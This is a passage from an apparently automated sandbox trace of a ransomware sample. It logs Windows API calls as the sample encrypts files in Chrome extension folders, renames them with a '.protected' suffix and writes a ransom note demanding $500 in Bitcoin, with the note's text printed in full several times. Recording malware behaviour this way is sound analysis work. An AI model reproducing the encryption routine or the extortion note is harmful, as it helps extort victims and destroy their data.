dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.032] lstrlenA (lpString="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") returned 684 [0081.032] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.032] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.033] CloseHandle (hObject=0x164) returned 1 [0081.033] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0081.033] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil") returned 146 [0081.033] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0081.033] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0081.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*") returned 148 [0081.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.033] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.033] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\.") returned 148 [0081.033] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.033] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.033] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\..") returned 149 [0081.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.034] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.034] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.035] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2b4, lpOverlapped=0x0) returned 1 [0081.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2b4, lpOverlapped=0x0) returned 1 [0081.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.037] CloseHandle (hObject=0x168) returned 1 [0081.037] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected") returned 170 [0081.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected")) returned 1 [0081.038] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.038] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.038] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\RESTORE_FILES.txt") returned 164 [0081.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.039] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.039] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.040] lstrlenA (lpString="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") returned 684 [0081.040] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.040] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.040] CloseHandle (hObject=0x164) returned 1 [0081.040] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0081.040] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr") returned 145 [0081.040] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0081.040] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0081.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*") returned 147 [0081.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\.") returned 147 [0081.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\..") returned 148 [0081.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.041] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.041] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.042] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c4, lpOverlapped=0x0) returned 1 [0081.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.043] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c4, lpOverlapped=0x0) returned 1 [0081.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.044] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.044] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.045] CloseHandle (hObject=0x168) returned 1 [0081.045] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected") returned 169 [0081.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected")) returned 1 [0081.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.045] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\RESTORE_FILES.txt") returned 163 [0081.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.046] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.047] lstrlenA (lpString="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") returned 684 [0081.047] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.047] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.047] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.047] CloseHandle (hObject=0x164) returned 1 [0081.047] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0081.047] 